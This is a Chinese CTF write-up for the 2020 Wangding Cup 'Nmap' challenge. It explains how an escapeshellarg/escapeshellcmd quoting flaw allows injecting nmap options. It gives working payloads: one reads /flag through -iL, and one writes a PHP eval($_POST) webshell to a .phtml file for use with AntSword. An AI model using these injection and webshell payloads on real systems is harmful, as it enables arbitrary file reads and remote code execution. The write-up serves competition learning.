当前位置: 首页 > news >正文

[网鼎杯 2020 朱雀组]Nmap 1

Nmap 相关参数

-iL 读取文件内容,以文件内容作为搜索目标
-o 输出到文件
举例

nmap -iL ip_target.txt -o result.txt

扫描ip_target.txt内包含的ip地址,输出扫描结果至result.txt
读取文件结果

# Nmap 6.47 scan initiated Fri Dec 24 06:48:23 2021 as: nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/a9950 -iL /flag -o 22' 127.0.0.1\ Failed to resolve "flag{c5e95c66-f441-496b-ac27-699ea43d5c32}". WARNING: No targets were specified, so 0 hosts scanned. # Nmap done at Fri Dec 24 06:48:23 2021 -- 0 IP addresses (0 hosts up) scanned in 0.11 seconds

会提示搜索内容失败,然后会写出来内容是啥,从而实现任意文件读取。

escapeshell

分为excapeshellarg()和escapeshellcmd()两个函数

escapeshellarg()

escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数,保证其作为参数的安全性。


用转义符转义所有单引号,然后用单引号包裹,如

123' aa

经过escapeshellarg,先转义单引号

123\' aa

再用单引号包裹

123'\'' aa

最后,escapeshellarg会将整个字符串用单引号包裹,让字符串变成这样

'123'\'' aa'

escapeshellcmd()

escapeshellcmd - 把字符串中可能欺骗shell命令的字符转义, 用以保证送到system函数或者exec函数的字符串是安全的。


可以看到,不光这些字符,转义符本身还有落单的引号也会被转义。
这个时候,我们把传入escapeshellarg的字符串拿过来,在经过这个函数的处理。

'123'\'' aa'

转义后

'123'\\'' aa\'

因为转义符被转义,最后的引号便落单,逃逸了出去。这个时候,被输入的字符串不再被当成单个参数处理(不再有引号包裹), 即逃出了这两个函数。

题目

输入127.0.0.1后如此回显

结合题目nmap

猜测将命令插在nmap命令中

127.0.0.1 -iL / flag -o 111

报错了,这里看wp得知要绕过

换用pyload

127.0.0.1' -iL /flag -o 111

这里要查看111'文件才行

具体

https://www.cnblogs.com/AikN/p/15727575.html

这里还可以写木马进去

' <?= @eval($_POST["pd"]);?> -oG pd.phtml '

写进去访问,连接蚁剑

https://www.cnblogs.com/buchuo/p/13614498.html

http://www.cnnetsun.cn/news/25244.html

相关文章:

  • 如何快速开展中小学AI教育:完整的AI通识课程指南
  • LeetCode 6. Z 字形变换 | 详细题解(附 C++ 代码)
  • 22、Linux 系统基础管理入门指南
  • 2026年大模型应用开发学习路线:四阶段转型指南,抓住未来3年的职业发展机遇!转AI大模型开发学习顺序真的很重要!
  • 26、Linux文件系统管理全攻略
  • 27、Linux 系统文件管理与共享全攻略
  • 33、网络安全测试与Shell脚本编程入门
  • Reverse Engineer‘s Toolkit:一体化逆向工程解决方案
  • STC宏晶 STC8H8K64U-45I-LQFP64/烧录 LQFP64 单片机
  • 微信支付PHP SDK终极指南:快速集成APIv3和APIv2的完整解决方案
  • 将MacBook刘海变身为高效文件传输中心
  • 苹果App Store应用程序上架方式全面指南
  • Hikari-LLVM15终极指南:5分钟掌握代码混淆核心技术
  • 教你使用服务器搭建 Next.js 电商独立站方案 Your Next Store 完整教程
  • 1、掌握 AWS Lambda:构建无服务器应用的全面指南
  • 二.AI知识科普
  • 面向水工、市政与环保工程的渗流控制:有限元方法、程序修改与参数化分析
  • 9、AWS Lambda:事件驱动模型与外部服务集成实践
  • radix_tree_node(约 7.3 GB)
  • 互联网大厂Java求职面试深度指导——场景、问答及代码案例解析
  • OpCore Simplify:终极Hackintosh配置解决方案
  • PolarDB - PostgreSQL
  • POCO C++库:构建高性能网络应用的终极解决方案
  • WebPlotDigitizer 数据提取终极教程:从入门到精通
  • SpringBoot基于Java的网吧管理系统(毕业设计项目源码+文档)
  • 收藏必备!从提示工程到上下文工程:让AI效率提升40%的7大核心模式
  • ModernWMS开源仓库管理系统:从零部署到生产环境实战指南
  • arXiv LaTeX Cleaner终极指南:保护隐私、优化论文提交的完整方案
  • 如何快速上手Whisper.cpp:语音识别的终极指南
  • 基于SSM的钢铁工厂管理系统的设计与实现(源码+lw+部署文档+讲解等)